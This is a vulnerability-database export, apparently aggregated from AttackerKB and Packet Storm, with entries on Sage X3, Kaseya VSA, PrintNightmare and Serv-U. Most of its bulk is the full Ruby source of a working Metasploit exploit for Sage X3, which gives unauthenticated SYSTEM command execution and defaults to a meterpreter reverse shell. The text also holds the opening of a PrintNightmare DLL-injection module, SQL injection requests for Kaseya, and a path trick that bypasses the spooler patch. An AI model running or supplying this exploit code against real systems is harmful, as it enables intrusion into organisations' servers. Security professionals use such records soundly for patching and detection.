# bufm\n s.write(delim0)\n s.recv(1024)\n\n # Packet --- 4\n sage_payload = \"@#{revsagedir}/tmp/sess#{filenum}$cmd\"\n head = \"\\x00\\x00\\x37\\x02\\x00\\x2f\\x00\"\n tail = 
\"\\x00\\x03\\x00\\x01\\x77\"\n sendbuf = build_buffer(head, sage_payload, tail)\n s.write(sendbuf)\n s.recv(1024)\n\n # Packet --- 5\n head = \"\\x02\\x00\\x05\\x08\\x00\\x00\\x00\"\n sage_payload = \"@echo off\\r\\n#{sagedir}\\\\tmp\\\\cmd#{filenum}.cmd 1>#{sagedir}\\\\tmp\\\\#{filenum}.out 2>#{sagedir}\\\\tmp\\\\#{filenum}.err\\r\\n@echo on\"\n sendbuf = build_buffer(head, sage_payload, nil)\n s.write(sendbuf)\n s.recv(1024)\n\n # Packet --- Delim\n s.write(delim0)\n s.recv(1024)\n\n # Packet --- 6\n head = \"\\x00\\x00\\x36\\x04\\x00\\x2e\\x00\"\n sage_payload = \"#{revsagedir}\\\\tmp\\\\sess#{filenum}.cmd\"\n tail = \"\\x00\\x03\\x00\\x01\\x72\"\n sendbuf = build_buffer(head, sage_payload, tail)\n s.write(sendbuf)\n s.recv(1024)\n\n # if it's not COMMAND, we can stop here\n # otherwise, we'll send/recv the last bit\n # of info for the output\n unless target.name == 'Windows Command'\n disconnect\n return\n end\n\n # Packet --- Delim\n delim1 = \"\\x02\\x00\\x05\\x05\\x00\\x00\\x10\\x00\"\n s.write(delim1)\n s.recv(1024)\n\n # Packet --- Delim\n s.write(delim0)\n s.recv(1024)\n\n # The two below are directing the server to read from the .out file that should have been created\n # Then we get the output back\n # Packet --- 7 - Still works when removed.\n head = \"\\x00\\x00\\x2f\\x07\\x08\\x00\\x2b\\x00\"\n sage_payload = \"@#{revsagedir}/tmp/#{filenum}$out\"\n sendbuf = build_buffer(head, sage_payload, nil)\n s.write(sendbuf)\n s.recv(1024)\n\n # Packet --- 8\n head = \"\\x00\\x00\\x33\\x02\\x00\\x2b\\x00\"\n sage_payload = \"@#{revsagedir}/tmp/#{filenum}$out\"\n tail = \"\\x00\\x03\\x00\\x01\\x72\"\n sendbuf = build_buffer(head, sage_payload, tail)\n s.write(sendbuf)\n s.recv(1024)\n\n s.write(delim1)\n returned_data = s.recv(8096).strip!\n\n if returned_data.nil? 
|| returned_data.empty?\n disconnect\n fail_with(Failure::PayloadFailed, 'No data appeared to be returned, try again')\n end\n\n print_good('------------ Response Received ------------')\n print_status(returned_data)\n disconnect\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36584", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2021-08-10T10:44:55", "description": "Sage X3 Unauthenticated Remote Command Execution (RCE) as SYSTEM in AdxDSrv.exe component. By editing the client side authentication request, an attacker can bypass credential validation. While exploiting this does require knowledge of the installation path, that information can be learned by exploiting CVE-2020-7387. This issue was fixed in AdxAdmin 93.2.53, which ships with updates for on-premises versions of Sage X3 including Version 9 (components shipped with Syracuse 9.22.7.2 and later), Sage X3 HR & Payroll Version 9 (those components that ship with Syracuse 9.24.1.3), Version 11 (components shipped with Syracuse 11.25.2.6 and later), and Version 12 (components shipped with Syracuse 12.10.2.8 and later) of Sage X3. Other on-premises versions of Sage X3 are unsupported by the vendor.\n\n \n**Recent assessments:** \n \n**wvu-r7** at July 08, 2021 3:54pm UTC reported:\n\nPlease see the [blog post](<https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/>) for more information. An [exploit](<https://github.com/rapid7/metasploit-framework/pull/15400>) has been posted. For all intents and purposes, this is unauthenticated RCE. 
A [patch](<https://www.sagecity.com/gb/sage-x3-uk/f/sage-x3-uk-announcements-news-and-alerts/147993/sage-x3-latest-patches>) is available.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {}, "published": "2021-07-07T00:00:00", "type": "attackerkb", "title": "CVE-2020-7388", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-7387", "CVE-2020-7388"], "modified": "2021-08-10T00:00:00", "id": "AKB:E22D11BC-89F5-42AA-B31B-78D5E22902DB", "href": "https://attackerkb.com/topics/q0ETmshZPW/cve-2020-7388", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T16:36:20", "description": "The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. Detailed description \u2014\u2013 Given the following request: `GET /InstallTab/exportFldr.asp?fldrId=1\u2019 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;` Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure. 
Response: `HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 <!DOCTYPE html> <HTML> <HEAD> <title>Whoops.</title> <meta http-equiv=\"X-UA-Compatible\" content=\"IE=Edge\" /> <link id=\"favIcon\" rel=\"shortcut icon\" href=\"/themes/default/images/favicon.ico?307447361\"></link> ----SNIP----` However when fldrId is set to \u2018(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))\u2019 the request is allowed. Request: `GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;` Response: `HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960 <html> <head> <title>Export Folder</title> <style> ------ SNIP -----`\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-09T00:00:00", "type": "attackerkb", "title": "CVE-2021-30117", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116", "CVE-2021-30117"], "modified": "2023-10-07T00:00:00", "id": "AKB:D51087FF-AE7C-4A0E-9BA9-F897BA18D238", "href": "https://attackerkb.com/topics/1KBaJEE0fi/cve-2021-30117", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T16:41:42", "description": "Kaseya VSA before 9.5.7 allows credential disclosure, as exploited in the wild in July 2021. By default Kaseya VSA on premise offers a download page where the clients for the installation can be downloaded. The default URL for this page is <https://x.x.x.x/dl.asp> When an attacker download a client for Windows and installs it, the file KaseyaD.ini is generated (C:\\Program Files (x86)\\Kaseya\\XXXXXXXXXX\\KaseyaD.ini) which contains an Agent_Guid and AgentPassword This Agent_Guid and AgentPassword can be used to log in on dl.asp ([https://x.x.x.x/dl.asp?un=840997037507813&pw=113cc622839a4077a84837485ced6b93e440bf66d44057713cb2f95e503a06d9](<https://x.x.x.x/dl.asp?un=840997037507813&pw=113cc622839a4077a84837485ced6b93e440bf66d44057713cb2f95e503a06d9>)) This request authenticates the client and returns a sessionId cookie that can be used in subsequent attacks to bypass authentication. 
Security issues discovered \u2014\u2013 * Unauthenticated download page leaks credentials * Credentials of agent software can be used to obtain a sessionId (cookie) that can be used for services not intended for use by agents * dl.asp accepts credentials via a GET request * Access to KaseyaD.ini gives an attacker access to sufficient information to penetrate the Kaseya installation and its clients. Impact \u2014\u2013 Via the page /dl.asp enough information can be obtained to give an attacker a sessionId that can be used to execute further (semi-authenticated) attacks against the system.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-09T00:00:00", "type": "attackerkb", "title": "CVE-2021-30116", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2023-10-07T00:00:00", "id": "AKB:923F0E8E-CF44-416D-A421-F2177898261A", "href": "https://attackerkb.com/topics/9rki8uOHTf/cve-2021-30116", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, 
{"lastseen": "2023-10-18T16:33:50", "description": "Windows Print Spooler Remote Code Execution Vulnerability\n\n \n**Recent assessments:** \n \n**kevthehermit** at June 30, 2021 1:53pm UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. It has been tested in Server 2016 and Server 2019.\n\nDisable the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\n**andretorresbr** at July 02, 2021 2:37am UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. 
It has been tested in Server 2016 and Server 2019.\n\nDisable the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\n**architect00** at July 01, 2021 1:46pm UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. It has been tested in Server 2016 and Server 2019.\n\nDisable the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\n**NinjaOperator** at June 29, 2021 5:55pm UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. 
It has been tested in Server 2016 and Server 2019.

Disabling the print spooler can prevent exploitation.

Event logs can be found for both successful and non-successful exploit attempts in some situations.

Sigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>

**ccondon-r7** at July 01, 2021 1:43pm UTC reported:

#### Vulnerability

This was originally classified as a Local Priv Escalation; however, recent POC code has been released that enables a domain-authenticated user to remotely escalate to `SYSTEM` on vulnerable services.

#### Exploit Code

There are several functional exploits available on GitHub after the initial repository was removed by the authors.

 * <https://github.com/afwu/PrintNightmare> – A Windows binary exploit
 * <https://github.com/cube0x0/CVE-2021-1675> – Python3 using a modified version of impacket

#### Mitigation

Initial testing shows that the patches released are not sufficient to stop this exploit. It has been tested in Server 2016 and Server 2019.

Disabling the print spooler can prevent exploitation.

Event logs can be found for both successful and non-successful exploit attempts in some situations.

Sigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>

Assessed Attacker Value: 5
Assessed Attacker Value: 5
Assessed Attacker Value: 5

AttackerKB record: CVE-2021-1675, published 2021-06-08, modified 2023-10-07. CVSS v3.1 8.8 HIGH (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H); CVSS v2 9.3 HIGH (AV:N/AC:M/Au:N/C:C/I:C/A:C). Related CVEs: CVE-2021-1675, CVE-2021-34527. Id AKB:CDA9C43E-015D-4B04-89D3-D6CABC5729B9, <https://attackerkb.com/topics/dI1bxlM0ay/cve-2021-1675>

### CVE-2021-34527 "PrintNightmare" (AttackerKB)

Windows Print Spooler Remote Code Execution Vulnerability

**Recent assessments:**

**zeroSteiner** at July 08, 2021 5:09pm UTC reported:

CVE-2021-34527 is related to the previous CVE-2021-1675. This fixes a vulnerability whereby an authenticated attacker can connect to the remote print service (via either MS-RPRN or MS-PAR) and add a driver using a custom DLL. Upon successful exploitation, the Print Spool service would load the attacker-controlled DLL from either a remote UNC path or a local path. In both cases, the DLL is then executed with NT AUTHORITY\SYSTEM privileges.

The patch for CVE-2021-34527 is effective at preventing this attack **only when Point and Print** is disabled, which is the default setting. This can be configured by ensuring the registry key `HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint NoWarningNoElevationOnInstall` is 0. The system does not need to be rebooted to enforce the changed registry key. If that registry key is defined as 1, the vulnerability can still be exploited. With Point and Print enabled, a standard UNC path used over the MS-RPRN vector (via `RpcAddPrinterDriverEx`) will fail with `ERROR_INVALID_PARAMETER`. This can be bypassed by converting the UNC path from the standard syntax (`\\1.2.3.4\public\payload.dll`) to the alternative syntax (`\??\UNC\1.2.3.4\public\payload.dll`).

With the patches applied and Point and Print disabled, the affected calls to `RpcAddPrinterDriverEx` will return ERROR_ACCESS_DENIED.

**ccondon-r7** at July 08, 2021 12:12am UTC reported: (identical to the assessment by zeroSteiner above)

Assessed Attacker Value: 5
Assessed Attacker Value: 5
Assessed Attacker Value: 4

AttackerKB record: CVE-2021-34527 "PrintNightmare", published 2021-07-02, modified 2022-05-25. CVSS v3.1 8.8 HIGH (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H); CVSS v2 9.3 HIGH (AV:N/AC:M/Au:N/C:C/I:C/A:C). Related CVEs: CVE-2021-1675, CVE-2021-34527. Id AKB:7575B82F-7B7A-4416-B1AA-B8A2DF4D0800, <https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare>

### CVE-2021-35211 (AttackerKB)

Microsoft discovered a remote code execution (RCE) vulnerability in the SolarWinds Serv-U product utilizing a Remote Memory Escape Vulnerability. If exploited, a threat actor may be able to gain privileged access to the machine hosting Serv-U Only. SolarWinds Serv-U Managed File Transfer and Serv-U Secure FTP for Windows before 15.2.3 HF2 are affected by this vulnerability.

**Recent assessments:**

**NinjaOperator** at July 12, 2021 4:00pm UTC reported:

SolarWinds was recently notified by Microsoft of a security vulnerability (RCE) related to Serv-U Managed File Transfer Server and Serv-U Secured FTP and have developed a hotfix to resolve this vulnerability. While Microsoft's research indicates this vulnerability exploit involves a limited, targeted set of customers and a single threat actor, our joint teams have mobilized to address it quickly.

The vulnerability exists in the latest Serv-U version 15.2.3 HF1 released May 5, 2021, and all prior versions. A threat actor who successfully exploits CVE-2021-34527 can run arbitrary code with SYSTEM privileges and install programs; view, change, or delete data, and run programs.

**wvu-r7** at July 22, 2021 4:35pm UTC reported: (identical to the assessment by NinjaOperator above)

Assessed Attacker Value: 5
Assessed Attacker Value: 5
Assessed Attacker Value: 4

AttackerKB record: CVE-2021-35211, published 2021-07-13, modified 2023-10-07. CVSS v3.1 10.0 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H); CVSS v2 10.0 HIGH (AV:N/AC:L/Au:N/C:C/I:C/A:C). Related CVEs: CVE-2021-34527, CVE-2021-35211. Id AKB:9ADF44D2-FA0D-4643-8B97-8B46983B6917, <https://attackerkb.com/topics/Toj3cA6kd7/cve-2021-35211>

### Sage X3 Administration Service Authentication Bypass / Command Execution (Packet Storm)

Packet Storm record PACKETSTORM:163624, published 2021-07-21, exploit for CVE-2020-7387 and CVE-2020-7388. <https://packetstormsecurity.com/files/163624/Sage-X3-Administration-Service-Authentication-Bypass-Command-Execution.html>, source: <https://packetstormsecurity.com/files/download/163624/x3_adxsrv_auth_bypass_cmd_exec.rb.txt>

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Sage X3 Administration Service Authentication Bypass Command Execution',
        'Description' => %q{
          This module leverages an authentication bypass exploit within Sage X3 AdxSrv's administration
          protocol to execute arbitrary commands as SYSTEM against a Sage X3 Server running an
          available AdxAdmin service.
        },
        'Author' => [
          'Jonathan Peterson <deadjakk[at]shell.rip>', # @deadjakk
          'Aaron Herndon' # @ac3lives
        ],
        'License' => MSF_LICENSE,
        'DisclosureDate' => '2021-07-07',
        'References' => [
          ['CVE', '2020-7387'], # Infoleak
          ['CVE', '2020-7388'], # RCE
          ['URL', 'https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/']
        ],
        'Privileged' => true,
        'Platform' => 'win',
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Targets' => [
          [
            'Windows Command',
            {
              'Arch' => ARCH_CMD,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/windows/generic',
                'CMD' => 'whoami'
              }
            }
          ],
          [
            'Windows DLL',
            {
              'Arch' => [ARCH_X86, ARCH_X64],
              'DefaultOptions' => {
                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
              }
            }
          ],
          [
            'Windows Executable',
            {
              'Arch' => [ARCH_X86, ARCH_X64],
              'DefaultOptions' => {
                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [FIRST_ATTEMPT_FAIL],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(1818)
      ]
    )
  end

  def vprint(msg = '')
    print(msg) if datastore['VERBOSE']
  end

  def check
    s = connect
    print_status('Connected')

    # ADXDIR command authentication header
    # allows for unauthenticated retrieval of X3 directory
    auth_packet = "\x09\x00"
    s.write(auth_packet)

    # recv response
    res = s.read(1024)

    if res.nil? || res.length != 4
      print_bad('ADXDIR authentication failed')
      return CheckCode::Safe
    end

    if res.chars == ["\xFF", "\xFF", "\xFF", "\xFF"]
      print_bad('ADXDIR authentication failed')
      return CheckCode::Safe
    end

    print_good('ADXDIR authentication successful.')

    # ADXDIR command
    adx_dir_msg = "\x07\x41\x44\x58\x44\x49\x52\x00"
    s.write(adx_dir_msg)
    directory = s.read(1024)

    return CheckCode::Safe if directory.nil?

    sagedir = directory[4..-2]
    print_good(format('Received directory info from host: %s', sagedir))
    disconnect

    CheckCode::Vulnerable(details: { sagedir: sagedir })
  rescue Rex::ConnectionError
    CheckCode::Unknown
  end

  def build_buffer(head, sage_payload, tail)
    buffer = ''

    # do things
    buffer << head if head
    buffer << sage_payload.length
    buffer << sage_payload
    buffer << tail if tail

    buffer
  end

  def write_file(sock, filenum, sage_payload, target, sagedir)
    s = sock

    # building the initial authentication packet
    # [2bytes][userlen 1 byte][username][userlen 1 byte][username][passlen 1 byte][CRYPT:HASH]
    # Note: the first byte of this auth packet is different from the ADXDIR command

    revsagedir = sagedir.gsub('\\', '/')

    s.write("\x06\x00")
    auth_resp = s.read(1024)

    fail_with(Failure::UnexpectedReply, 'Directory message did not provide intended response') if auth_resp.length != 4

    print_good('Command authentication successful.')

    # May require additional information such as file path
    # this will be used for multiple messages

    head = "\x00\x00\x36\x02\x00\x2e\x00" # head
    fmt = '@%s/tmp/cmd%s$cmd'
    fmt = '@%s/tmp/cmd%s.dll' if target == 'Windows DLL'
    fmt = '@%s/tmp/cmd%s.exe' if target == 'Windows Executable'
    pload = format(fmt, revsagedir, filenum)
    tail = "\x00\x03\x00\x01\x77"
    sendbuf = build_buffer(head, pload, tail)
    s.write(sendbuf)
    s.read(1024)

    # Packet --- 3
    # Creating the packet that contains the command to run
    head = "\x02\x00\x05\x08\x00\x00\x00"

    # this writes the data to the .cmd file to get executed
    # a single write can't be larger than ~250 bytes
    # so writes larger than 250 need to be broken up
    written = 0
    print_status('Writing data')

    while written < sage_payload.length
      vprint('.')

      towrite = sage_payload[written..written + 250]
      sendbuf = build_buffer(head, towrite, nil)
      s.write(sendbuf)
      s.recv(1024)

      written += towrite.length
    end

    vprint("\r\n")
  end

  def exploit
    sage_payload = payload.encoded if target.name == 'Windows Command'
    sage_payload = generate_payload_dll if target.name == 'Windows DLL'
    sage_payload = generate_payload_exe if target.name == 'Windows Executable'

    sagedir = check.details[:sagedir]

    if sagedir.nil?
      fail_with(Failure::NotVulnerable,
                'No directory was returned by the remote host, may not be vulnerable')
    end

    if sagedir.end_with?('AdxAdmin')
      register_dir_for_cleanup("#{sagedir}\\tmp")
    end

    revsagedir = sagedir.gsub('\\', '/')

    filenum = rand_text_numeric(8)
    vprint_status(format('Using generated filename: %s', filenum))

    s = connect

    write_file(s, filenum, sage_payload, target.name, sagedir)

    unless target.name == 'Windows Command'
      disconnect
      # re-establish connection after writing file
      s = connect
    end

    if target.name == 'Windows DLL'
      sage_payload = "rundll32.exe #{sagedir}\\tmp\\cmd#{filenum}.dll,0"
      vprint_status(sage_payload)
      write_file(s, filenum, sage_payload, nil, sagedir)
    end

    if target.name == 'Windows Executable'
      sage_payload = "#{sagedir}\\tmp\\cmd#{filenum}.exe"
      vprint_status(sage_payload)
      write_file(s, filenum, sage_payload, nil, sagedir)
    end

    # Some sort of delimiter
    delim0 = "\x02\x00\x01\x01" # bufm
    s.write(delim0)
    s.recv(1024)

    # Packet --- 4
    sage_payload = "@#{revsagedir}/tmp/sess#{filenum}$cmd"
    head = "\x00\x00\x37\x02\x00\x2f\x00"
    tail = "\x00\x03\x00\x01\x77"
    sendbuf = build_buffer(head, sage_payload, tail)
    s.write(sendbuf)
    s.recv(1024)

    # Packet --- 5
    head = "\x02\x00\x05\x08\x00\x00\x00"
    sage_payload = "@echo off\r\n#{sagedir}\\tmp\\cmd#{filenum}.cmd 1>#{sagedir}\\tmp\\#{filenum}.out 2>#{sagedir}\\tmp\\#{filenum}.err\r\n@echo on"
    sendbuf = build_buffer(head, sage_payload, nil)
    s.write(sendbuf)
    s.recv(1024)

    # Packet --- Delim
    s.write(delim0)
    s.recv(1024)

    # Packet --- 6
    head = "\x00\x00\x36\x04\x00\x2e\x00"
    sage_payload = "#{revsagedir}\\tmp\\sess#{filenum}.cmd"
    tail = "\x00\x03\x00\x01\x72"
    sendbuf = build_buffer(head, sage_payload, tail)
    s.write(sendbuf)
    s.recv(1024)

    # if it's not COMMAND, we can stop here
    # otherwise, we'll send/recv the last bit
    # of info for the output
    unless target.name == 'Windows Command'
      disconnect
      return
    end

    # Packet --- Delim
    delim1 = "\x02\x00\x05\x05\x00\x00\x10\x00"
    s.write(delim1)
    s.recv(1024)

    # Packet --- Delim
    s.write(delim0)
    s.recv(1024)

    # The two below are directing the server to read from the .out file that should have been created
    # Then we get the output back
    # Packet --- 7 - Still works when removed.
    head = "\x00\x00\x2f\x07\x08\x00\x2b\x00"
    sage_payload = "@#{revsagedir}/tmp/#{filenum}$out"
    sendbuf = build_buffer(head, sage_payload, nil)
    s.write(sendbuf)
    s.recv(1024)

    # Packet --- 8
    head = "\x00\x00\x33\x02\x00\x2b\x00"
    sage_payload = "@#{revsagedir}/tmp/#{filenum}$out"
    tail = "\x00\x03\x00\x01\x72"
    sendbuf = build_buffer(head, sage_payload, tail)
    s.write(sendbuf)
    s.recv(1024)

    s.write(delim1)
    returned_data = s.recv(8096).strip!

    if returned_data.nil? || returned_data.empty?
      disconnect
      fail_with(Failure::PayloadFailed, 'No data appeared to be returned, try again')
    end

    print_good('------------ Response Received ------------')
    print_status(returned_data)
    disconnect
  end

end
```

### Print Spooler Remote DLL Injection (Packet Storm)

Packet Storm record PACKETSTORM:167261, published 2022-05-25, exploit for CVE-2021-1675 and CVE-2021-34527. CVSS v3.1 8.8 HIGH (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H); CVSS v2 9.3 HIGH (AV:N/AC:M/Au:N/C:C/I:C/A:C). <https://packetstormsecurity.com/files/167261/Print-Spooler-Remote-DLL-Injection.html>, source: <https://packetstormsecurity.com/files/download/167261/cve_2021_1675_printnightmare.rb.txt>

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'windows_error'
require 'ruby_smb'
require 'ruby_smb/error'

class MetasploitModule < Msf::Exploit::Remote

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client::Authenticated
  include Msf::Exploit::Remote::SMB::Server::Share
  include Msf::Exploit::Retry
  include Msf::Exploit::EXE
  include Msf::Exploit::Deprecated

  moved_from 'auxiliary/admin/dcerpc/cve_2021_1675_printnightmare'

  PrintSystem = RubySMB::Dcerpc::PrintSystem

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Print Spooler Remote DLL Injection',
        'Description' => %q{
          The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted
          DCERPC request, resulting in remote code execution as NT AUTHORITY\SYSTEM. This module uses the MS-RPRN
          vector which requires the Print Spooler service to be running.
        },
        'Author' => [
          'Zhiniang Peng', # vulnerability discovery / research
          'Xuefeng Li', # vulnerability discovery / research
          'Zhipeng Huo', # vulnerability discovery
          'Piotr Madej', # vulnerability discovery
          'Zhang Yunhai', # vulnerability discovery
          'cube0x0', # PoC
          'Spencer McIntyre', # metasploit module
          'Christophe De La Fuente', # metasploit module co-author
        ],
        'License' => MSF_LICENSE,
        'DefaultOptions' => {
          'SRVHOST' => Rex::Socket.source_address
        },
        'Stance' => Msf::Exploit::Stance::Aggressive,
        'Targets' => [
          [
            'Windows', {
              'Platform' => 'win',
